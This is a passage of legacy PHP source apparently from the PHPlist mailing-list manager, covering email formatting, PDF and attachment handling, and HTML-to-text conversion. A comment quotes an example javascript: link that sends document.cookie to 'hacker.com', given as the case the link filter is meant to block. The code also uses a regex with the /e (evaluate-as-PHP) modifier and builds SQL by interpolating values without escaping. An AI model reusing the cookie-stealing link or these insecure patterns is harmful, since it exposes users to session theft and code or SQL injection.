  495.   }
    496. 

  496. 

  497.   # so what do we actually send?
    498. 

  498.   switch($cached[$messageid]["sendformat"]) {
    499. 

  499.     case "HTML":
    500. 

  500.       # send html to users who want it and text to everyone else
    501. 

  501.       if ($htmlpref) {
    502. 

  502.         Sql_Query("update {$GLOBALS["tables"]["message"]} set ashtml = ashtml + 1 where id = $messageid");
    503. 

  503.         if (ENABLE_RSS && sizeof($rssitems))
    504. 

  504.           updateRSSStats($rssitems,"ashtml");
    505. 

  505.       #  dbg("Adding HTML ".$cached[$messageid]["templateid"]);
    506. 

  506.         $mail->add_html($htmlmessage,"",$cached[$messageid]["templateid"]);
    507. 

  507.         addAttachments($messageid,$mail,"HTML");
    508. 

  508.       } else {
    509. 

  509.         Sql_Query("update {$GLOBALS["tables"]["message"]} set astext = astext + 1 where id = $messageid");
    510. 

  510.         if (ENABLE_RSS && sizeof($rssitems))
    511. 

  511.           updateRSSStats($rssitems,"astext");
    512. 

  512.         $mail->add_text($textmessage);
    513. 

  513.         addAttachments($messageid,$mail,"text");
    514. 

  514.       }
    515. 

  515.       break;
    516. 

  516.     case "both":
    517. 

  517.     case "text and HTML":
    518. 

  518.       # send one big file to users who want html and text to everyone else
    519. 

  519.       if ($htmlpref) {
    520. 

  520.         Sql_Query("update {$GLOBALS["tables"]["message"]} set astextandhtml = astextandhtml + 1 where id = $messageid");
    521. 

  521.         if (ENABLE_RSS && sizeof($rssitems))
    522. 

  522.           updateRSSStats($rssitems,"ashtml");
    523. 

  523.       #  dbg("Adding HTML ".$cached[$messageid]["templateid"]);
    524. 

  524.         $mail->add_html($htmlmessage,$textmessage,$cached[$messageid]["templateid"]);
    525. 

  525.         addAttachments($messageid,$mail,"HTML");
    526. 

  526.       } else {
    527. 

  527.         Sql_Query("update {$GLOBALS["tables"]["message"]} set astext = astext + 1 where id = $messageid");
    528. 

  528.         if (ENABLE_RSS && sizeof($rssitems))
    529. 

  529.           updateRSSStats($rssitems,"astext");
    530. 

  530.         $mail->add_text($textmessage);
    531. 

  531.         addAttachments($messageid,$mail,"text");
    532. 

  532.       }
    533. 

  533.       break;
    534. 

  534.     case "PDF":
    535. 

  535.       # send a PDF file to users who want html and text to everyone else
    536. 

  536.       if (ENABLE_RSS && sizeof($rssitems))
    537. 

  537.         updateRSSStats($rssitems,"astext");
    538. 

  538.       if ($htmlpref) {
    539. 

  539.         Sql_Query("update {$GLOBALS["tables"]["message"]} set aspdf = aspdf + 1 where id = $messageid");
    540. 

  540.         $pdffile = createPdf($textmessage);
    541. 

  541.         if (is_file($pdffile) && filesize($pdffile)) {
    542. 

  542.           $fp = fopen($pdffile,"r");
    543. 

  543.           if ($fp) {
    544. 

  544.             $contents = fread($fp,filesize($pdffile));
    545. 

  545.             fclose($fp);
    546. 

  546.            unlink($pdffile);
    547. 

  547.            $html = '<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
    548. 

  548.               <html>
    549. 

  549.               <head>
    550. 

  550.                 <title></title>
    551. 

  551.               </head>
    552. 

  552.               <body>
    553. 

  553.               <embed src="message.pdf" width="450" height="450" href="message.pdf"></embed>
    554. 

  554.               </body>
    555. 

  555.               </html>';
    556. 

  556. #            $mail->add_html($html,$textmessage);
    557. 

  557. #            $mail->add_text($textmessage);
    558. 

  558.             $mail->add_attachment($contents,
    559. 

  559.               "message.pdf",
    560. 

  560.               "application/pdf");
    561. 

  561.           }
    562. 

  562.         }
    563. 

  563.         addAttachments($messageid,$mail,"HTML");
    564. 

  564.       } else {
    565. 

  565.         Sql_Query("update {$GLOBALS["tables"]["message"]} set astext = astext + 1 where id = $messageid");
    566. 

  566.         $mail->add_text($textmessage);
    567. 

  567.         addAttachments($messageid,$mail,"text");
    568. 

  568.       }
    569. 

  569.       break;
    570. 

  570.     case "text and PDF":
    571. 

  571.       if (ENABLE_RSS && sizeof($rssitems))
    572. 

  572.         updateRSSStats($rssitems,"astext");
    573. 

  573.       # send a PDF file to users who want html and text to everyone else
    574. 

  574.       if ($htmlpref) {
    575. 

  575.         Sql_Query("update {$GLOBALS["tables"]["message"]} set astextandpdf = astextandpdf + 1 where id = $messageid");
    576. 

  576.         $pdffile = createPdf($textmessage);
    577. 

  577.         if (is_file($pdffile) && filesize($pdffile)) {
    578. 

  578.           $fp = fopen($pdffile,"r");
    579. 

  579.           if ($fp) {
    580. 

  580.             $contents = fread($fp,filesize($pdffile));
    581. 

  581.             fclose($fp);
    582. 

  582.             unlink($pdffile);
    583. 

  583.            $html = '<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
    584. 

  584.               <html>
    585. 

  585.               <head>
    586. 

  586.                 <title></title>
    587. 

  587.               </head>
    588. 

  588.               <body>
    589. 

  589.               <embed src="message.pdf" width="450" height="450" href="message.pdf"></embed>
    590. 

  590.               </body>
    591. 

  591.               </html>';
    592. 

  592.  #           $mail->add_html($html,$textmessage);
    593. 

  593.              $mail->add_text($textmessage);
    594. 

  594.             $mail->add_attachment($contents,
    595. 

  595.               "message.pdf",
    596. 

  596.               "application/pdf");
    597. 

  597.           }
    598. 

  598.         }
    599. 

  599.         addAttachments($messageid,$mail,"HTML");
    600. 

  600.       } else {
    601. 

  601.         Sql_Query("update {$GLOBALS["tables"]["message"]} set astext = astext + 1 where id = $messageid");
    602. 

  602.         $mail->add_text($textmessage);
    603. 

  603.         addAttachments($messageid,$mail,"text");
    604. 

  604.       }
    605. 

  605.       break;
    606. 

  606.     case "text":
    607. 

  607.     default:
    608. 

  608.       # send as text
    609. 

  609.       if (ENABLE_RSS && sizeof($rssitems))
    610. 

  610.         updateRSSStats($rssitems,"astext");
    611. 

  611.       Sql_Query("update {$GLOBALS["tables"]["message"]} set astext = astext + 1 where id = $messageid");
    612. 

  612.        $mail->add_text($textmessage);
    613. 

  613.       addAttachments($messageid,$mail,"text");
    614. 

  614.       break;
    615. 

  615.   }
    616. 

  616.   $mail->build_message(
    617. 

  617.       array(
    618. 

  618.         "html_charset" => $cached[$messageid]["html_charset"],
    619. 

  619.         "html_encoding" => HTMLEMAIL_ENCODING,
    620. 

  620.         "text_charset" => $cached[$messageid]["text_charset"],
    621. 

  621.         "text_encoding" => TEXTEMAIL_ENCODING)
    622. 

  622.       );
    623. 

  623. 

  624. 

  625.   if (!TEST) {
    626. 

  626.     if ($hash != 'forwarded' || !sizeof($forwardedby)) {
    627. 

  627.       $fromname = $cached[$messageid]["fromname"];
    628. 

  628.       $fromemail = $cached[$messageid]["fromemail"];
    629. 

  629.       $subject = $cached[$messageid]["subject"];
    630. 

  630.     } else {
    631. 

  631.       $fromname = '';
    632. 

  632.       $fromemail = $forwardedby['email'];
    633. 

  633.       $subject = $GLOBALS['strFwd'].': '.$cached[$messageid]["subject"];
    634. 

  634.     }
    635. 

  635. 

  636.     if (!$mail->send("", $destinationemail, $fromname, $fromemail, $subject)) {
    637. 

  637.       logEvent("Error sending message $messageid to $email ($destinationemail)");
    638. 

  638.       return 0;
    639. 

  639.     } else {
    640. 

  640.       return 1;
    641. 

  641.     }
    642. 

  642.   }
    643. 

  643.   return 0;
    644. 

  644. }
    645. 

  645. 

  646. function addAttachments($msgid,&$mail,$type) {
    647. 

  647.   global $attachment_repository,$website;
    648. 

  648.   if (ALLOW_ATTACHMENTS) {
    649. 

  649.     $req = Sql_Query("select * from {$GLOBALS["tables"]["message_attachment"]},{$GLOBALS["tables"]["attachment"]}
    650. 

  650.       where {$GLOBALS["tables"]["message_attachment"]}.attachmentid = {$GLOBALS["tables"]["attachment"]}.id and
    651. 

  651.       {$GLOBALS["tables"]["message_attachment"]}.messageid = $msgid");
    652. 

  652.     if (!Sql_Affected_Rows())
    653. 

  653.       return;
    654. 

  654.     if ($type == "text") {
    655. 

  655.       $mail->append_text($GLOBALS["strAttachmentIntro"]."\n");
    656. 

  656.     }
    657. 

  657. 

  658.     while ($att = Sql_Fetch_array($req)) {
    659. 

  659.       switch ($type) {
    660. 

  660.         case "HTML":
    661. 

  661.           if (is_file($GLOBALS["attachment_repository"]."/".$att["filename"]) && filesize($GLOBALS["attachment_repository"]."/".$att["filename"])) {
    662. 

  662.             $fp = fopen($GLOBALS["attachment_repository"]."/".$att["filename"],"r");
    663. 

  663.             if ($fp) {
    664. 

  664.               $contents = fread($fp,filesize($GLOBALS["attachment_repository"]."/".$att["filename"]));
    665. 

  665.               fclose($fp);
    666. 

  666.               $mail->add_attachment($contents,
    667. 

  667.                 basename($att["remotefile"]),
    668. 

  668.                 $att["mimetype"]);
    669. 

  669.             }
    670. 

  670.           } elseif (is_file($att["remotefile"]) && filesize($att["remotefile"])) {
    671. 

  671.             # handle local filesystem attachments
    672. 

  672.             $fp = fopen($att["remotefile"],"r");
    673. 

  673.             if ($fp) {
    674. 

  674.               $contents = fread($fp,filesize($att["remotefile"]));
    675. 

  675.               fclose($fp);
    676. 

  676.               $mail->add_attachment($contents,
    677. 

  677.                 basename($att["remotefile"]),
    678. 

  678.                 $att["mimetype"]);
    679. 

  679.               list($name,$ext) = explode(".",basename($att["remotefile"]));
    680. 

  680.               # create a temporary file to make sure to use a unique file name to store with
    681. 

  681.               $newfile = tempnam($GLOBALS["attachment_repository"],$name);
    682. 

  682.               $newfile .= ".".$ext;
    683. 

  683.               $newfile = basename($newfile);
    684. 

  684.               $fd = fopen( $GLOBALS["attachment_repository"]."/".$newfile, "w" );
    685. 

  685.               fwrite( $fd, $contents );
    686. 

  686.               fclose( $fd );
    687. 

  687.               # check that it was successful
    688. 

  688.               if (filesize($GLOBALS["attachment_repository"]."/".$newfile)) {
    689. 

  689.                 Sql_Query(sprintf('update %s set filename = "%s" where id = %d',
    690. 

  690.                   $GLOBALS["tables"]["attachment"],$newfile,$att["attachmentid"]));
    691. 

  691.               } else {
    692. 

  692.                 # now this one could be sent many times, so send only once per run
    693. 

  693.                 if (!isset($GLOBALS[$att["remotefile"]."_warned"])) {
    694. 

  694.                   logEvent("Unable to make a copy of attachment ".$att["remotefile"]." in repository");
    695. 

  695.                   $msg = "Error, when trying to send message $msgid the filesystem attachment
    696. 

  696.                     ".$att["remotefile"]." could not be copied to the repository. Check for permissions.";
    697. 

  697.                   sendMail(getConfig("report_address"),"Mail list error",$msg,"");
    698. 

  698.                   $GLOBALS[$att["remotefile"]."_warned"] = time();
    699. 

  699.                 }
    700. 

  700.               }
    701. 

  701.             } else {
    702. 

  702.               logEvent("failed to open attachment ".$att["remotefile"]." to add to message $msgid ");
    703. 

  703.             }
    704. 

  704.           } else {
    705. 

  705.             logEvent("Attachment ".$att["remotefile"]." does not exist");
    706. 

  706.             $msg = "Error, when trying to send message $msgid the attachment
    707. 

  707.               ".$att["remotefile"]." could not be found";
    708. 

  708.             sendMail(getConfig("report_address"),"Mail list error",$msg,"");
    709. 

  709.           }
    710. 

  710.            break;
    711. 

  711.          case "text":
    712. 

  712.           $viewurl = "http://".$website.$GLOBALS["pageroot"].'/dl.php?id='.$att["id"];
    713. 

  713.           $mail->append_text($att["description"]."\n".$GLOBALS["strLocation"].": ".$viewurl);
    714. 

  714.           break;
    715. 

  715.       }
    716. 

  716.     }
    717. 

  717.   }
    718. 

  718. }
    719. 

  719. 

  720. function createPDF($text) {
    721. 

  721.   if (!isset($GLOBALS["pdf_font"])) {
    722. 

  722.     $GLOBALS["pdf_font"] = 'Arial';
    723. 

  723.     $GLOBALS["pdf_fontsize"] = 12;
    724. 

  724.    }
    725. 

  725.   $pdf=new FPDF();
    726. 

  726.   $pdf->SetCreator("PHPlist version ".VERSION);
    727. 

  727.   $pdf->Open();
    728. 

  728.   $pdf->AliasNbPages();
    729. 

  729.   $pdf->AddPage();
    730. 

  730.   $pdf->SetFont($GLOBALS["pdf_font"],$GLOBALS["pdf_fontstyle"],$GLOBALS["pdf_fontsize"]);
    731. 

  731.   $pdf->Write((int)$GLOBALS["pdf_fontsize"]/2,$text);
    732. 

  732.   $fname = tempnam($GLOBALS["tmpdir"],"pdf");
    733. 

  733.   $pdf->Output($fname,false);
    734. 

  734.   return $fname;
    735. 

  735. }
    736. 

  736. 

  737. function replaceChars($text) {
    738. 

  738. // $document should contain an HTML document.
    739. 

  739. // This will remove HTML tags, javascript sections
    740. 

  740. // and white space. It will also convert some
    741. 

  741. // common HTML entities to their text equivalent.
    742. 

  742. 

  743. $search = array ("'&(quot|#34);'i",  // Replace html entities
    744. 

  744.                  "'&(amp|#38);'i",
    745. 

  745.                  "'&(lt|#60);'i",
    746. 

  746.                  "'&(gt|#62);'i",
    747. 

  747.                  "'&(nbsp|#160);'i",
    748. 

  748.                  "'&(iexcl|#161);'i",
    749. 

  749.                  "'&(cent|#162);'i",
    750. 

  750.                  "'&(pound|#163);'i",
    751. 

  751.                  "'&(copy|#169);'i",
    752. 

  752.                  "'&#(\d+);'e");  // evaluate as php
    753. 

  753. 

  754. $replace = array ("\"",
    755. 

  755.                   "&",
    756. 

  756.                   "<",
    757. 

  757.                   ">",
    758. 

  758.                   " ",
    759. 

  759.                   chr(161),
    760. 

  760.                   chr(162),
    761. 

  761.                   chr(163),
    762. 

  762.                   chr(169),
    763. 

  763.                   "chr(\\1)");
    764. 

  764. #"
    765. 

  765. $text = preg_replace ($search, $replace, $text);
    766. 

  766.   return $text;
    767. 

  767. }
    768. 

  768. 

  769. function stripHTML($text) {
    770. 

  770.   # strip HTML, and turn links into the full URL
    771. 

  771.   $text = preg_replace("/\r/","",$text);
    772. 

  772. 

  773.   #$text = preg_replace("/\n/","###NL###",$text);
    774. 

  774.   $text = preg_replace("/<script[^>]*>(.*?)<\/script\s*>/is","",$text);
    775. 

  775.   $text = preg_replace("/<style[^>]*>(.*?)<\/style\s*>/is","",$text);
    776. 

  776. 

  777.   # would prefer to use < and > but the strip tags below would erase that.
    778. 

  778. #  $text = preg_replace("/<a href=\"(.*?)\"[^>]*>(.*?)<\/a>/is","\\2\n{\\1}",$text,100);
    779. 

  779. 

  780.   $text = preg_replace("/<a href=\"(.*?)\"[^>]*>(.*?)<\/a>/is","[URLTEXT]\\2[/URLTEXT][LINK]\\1[/LINK]",$text,100);
    781. 

  781. 

  782.   $text = preg_replace("/<b>(.*?)<\/b\s*>/is","*\\1*",$text);
    783. 

  783.   $text = preg_replace("/<h[\d]>(.*?)<\/h[\d]\s*>/is","**\\1**\n",$text);
    784. 

  784.   $text = preg_replace("/\s+/"," ",$text);
    785. 

  785.   $text = preg_replace("/<i>(.*?)<\/i\s*>/is","/\\1/",$text);
    786. 

  786.   $text = preg_replace("/<\/tr\s*?>/i","<\/tr>\n\n",$text);
    787. 

  787.   $text = preg_replace("/<\/p\s*?>/i","<\/p>\n\n",$text);
    788. 

  788.   $text = preg_replace("/<br\s*?>/i","<br>\n",$text);
    789. 

  789.   $text = preg_replace("/<br\s*?\/>/i","<br\/>\n",$text);
    790. 

  790.   $text = preg_replace("/<table/i","\n\n<table",$text);
    791. 

  791.   $text = strip_tags($text);
    792. 

  792. 

  793.   # find all URLs and replace them back
    794. 

  794.   preg_match_all('~\[URLTEXT\](.*)\[/URLTEXT\]\[LINK\](.*)\[/LINK\]~Ui', $text, $links);
    795. 

  795.   foreach ($links[0] as $matchindex => $fullmatch) {
    796. 

  796.     $linktext = $links[1][$matchindex];
    797. 

  797.     $linkurl = $links[2][$matchindex];
    798. 

  798.     # check if the text linked is a repetition of the URL
    799. 

  799.     if (strtolower(trim($linktext)) == strtolower(trim($linkurl)) ||
    800. 

  800.       'http://'.strtolower(trim($linktext)) == strtolower(trim($linkurl))) {
    801. 

  801.         $linkreplace = $linkurl;
    802. 

  802.     } else {
    803. 

  803.       $linkreplace = $linktext.' <'.$linkurl.'>';
    804. 

  804.     }
    805. 

  805.     $text = preg_replace('~'.preg_quote($fullmatch).'~',$linkreplace,$text);
    806. 

  806.   }
    807. 

  807.   $text = preg_replace("/<a href=\"(.*?)\"[^>]*>(.*?)<\/a>/is","[URLTEXT]\\2[/URLTEXT][LINK]\\1[/LINK]",$text,100);
    808. 

  808. 

  809.   $text = replaceChars($text);
    810. 

  810.   $text = preg_replace("/###NL###/","\n",$text);
    811. 

  811.   # reduce whitespace
    812. 

  812.   while (preg_match("/  /",$text))
    813. 

  813.     $text = preg_replace("/  /"," ",$text);
    814. 

  814.   while (preg_match("/\n\s*\n\s*\n/",$text))
    815. 

  815.     $text = preg_replace("/\n\s*\n\s*\n/","\n\n",$text);
    816. 

  816.   $text = wordwrap($text,70);
    817. 

  817.   return $text;
    818. 

  818. }
    819. 

  819. 

  820. function parseText($text) {
    821. 

  821.   # bug in PHP? get rid of newlines at the beginning of text
    822. 

  822.   $text = ltrim($text);
    823. 

  823. 

  824.   # make urls and emails clickable
    825. 

  825.   $text = eregi_replace("([\._a-z0-9-]+@[\.a-z0-9-]+)",'<a href="mailto:\\1" class="email">\\1</a>',$text);
    826. 

  826.   $link_pattern="/(.*)<a.*href\s*=\s*\"(.*?)\"\s*(.*?)>(.*?)<\s*\/a\s*>(.*)/is";
    827. 

  827. 

  828.   $i=0;
    829. 

  829.   while (preg_match($link_pattern, $text, $matches)){
    830. 

  830.     $url=$matches[2];
    831. 

  831.     $rest = $matches[3];
    832. 

  832.     if (!preg_match("/^(http:)|(mailto:)|(ftp:)|(https:)/i",$url)){
    833. 

  833.       # avoid this
    834. 

  834.       #<a href="javascript:window.open('http://hacker.com?cookie='+document.cookie)">
    835. 

  835.       $url = preg_replace("/:/","",$url);
    836. 

  836.     }
    837. 

  837.     $link[$i]= '<a href="'.$url.'" '.$rest.'>'.$matches[4].'</a>';
    838. 

  838.     $text = $matches[1]."%%$i%%".$matches[5];
    839. 

  839.     $i++;
    840. 

  840.   }
    841. 

  841. 

  842.   $text = preg_replace("/(www\.[a-zA-Z0-9\.\/#~:?+=&%@!_\\-]+)/i", "http://\\1"  ,$text);#make www. -> http://www.
    843. 

  843.   $text = preg_replace("/(https?:\/\/)http?:\/\//i", "\\1"  ,$text);#take out duplicate schema
    844. 

  844.   $text = preg_replace("/(ftp:\/\/)http?:\/\//i", "\\1"  ,$text);#take out duplicate schema
    845. 

  845.   $text = preg_replace("/(https?:\/\/)(?!www)([a-zA-Z0-9\.\/#~:?+=&%@!_\\-]+)/i", "<a href=\"\\1\\2\" class=\"url\"  target=\"_blank\">\\1\\2</a>"  ,$text); #eg-- http://kernel.org -> <a href"http://kernel.org" target="_blank">http://kernel.org</a>
    846. 

  846.   $text = preg_replace("/(https?:\/\/)(www\.)([a-zA-Z0-9\.\/#~:?+=&%@!\\-_]+)/i", "<a href=\"\\1\\2\\3\" class=\"url\" target=\"_blank\">\\2\\3</a>"  ,$text); #eg -- http://www.google.com -> <a href"http://www.google.com" target="_blank">www.google.com</a>
    847. 

  847. 

  848.   for ($j = 0;$j<$i;$j++) {
    849. 

  849.     $replacement = $link[$j];
    850. 

  850.     $text = preg_replace("/\%\%$j\%\%/",$replacement, $text);
    851. 

  851.   }
    852. 

  852. 

  853.   # hmm, regular expression choke on some characters in the text
    854. 

  854.   # first replace all the brackets with placeholders.
    855. 

  855.   # we cannot use htmlspecialchars or addslashes, because some are needed
    856. 

  856. 

  857.   $text = ereg_replace("\(","<!--LB-->",$text);
    858. 

  858.   $text = ereg_replace("\)","<!--RB-->",$text);
    859. 

  859.   $text = preg_replace('/\$/',"<!--DOLL-->",$text);
    860. 

  860. 

  861.   # @@@ to be xhtml compabible we'd have to close the <p> as well
    862. 

  862.   # so for now, just make it two br/s, which will be done by replacing
    863. 

  863.   # \n with <br/>
    864. 

  864. #  $paragraph = '<p>';
    865. 

  865.   $br = '<br />';
    866. 

  866.   $text = ereg_replace("\r","",$text);
    867. 

  867. #  $text = ereg_replace("\n\n","\n".$paragraph,$text);
    868. 

  868.   $text = ereg_replace("\n","$br\n",$text);
    869. 

  869. 

  870.   # reverse our previous placeholders
    871. 

  871.   $text = ereg_replace("<!--LB-->","(",$text);
    872. 

  872.   $text = ereg_replace("<!--RB-->",")",$text);
    873. 

  873.   $text = ereg_replace("<!--DOLL-->","\$",$text);
    874. 

  874.   return $text;
    875. 

  875. }
    876. 

  876. 

  877. function addHTMLFooter($message,$footer) {
    878. 

  878.   if (preg_match('#</body>#imUx',$message)) {
    879. 

  879.     $message = preg_replace('#</body>#',$footer.'</body>',$message);
    880. 

  880.   } else {
    881. 

  881.     $message .= $footer;
    882. 

  882.   }
    883. 

  883.   return $message;
    884. 

  884. }
    885. 

  885. 

  886. # make sure the 0 template has the powered by image
    887. 

  887. Sql_Query(sprintf('select * from %s where filename = "%s" and template = 0',
    888. 

  888.   $GLOBALS["tables"]["templateimage"],"powerphplist.png"));
    889. 

  889. if (!Sql_Affected_Rows())
    890. 

  890.   Sql_Query(sprintf('insert into %s (template,mimetype,filename,data,width,height)
    891. 

  891.   values(0,"%s","%s","%s",%d,%d)',
    892. 

  892.   $GLOBALS["tables"]["templateimage"],"image/png","powerphplist.png",
    893. 

  893.   $newpoweredimage,
    894. 

  894.   70,30));
    895. 

  895. 

  896. 

  897. ?>
    898. 

  898. 

  899. 

  900.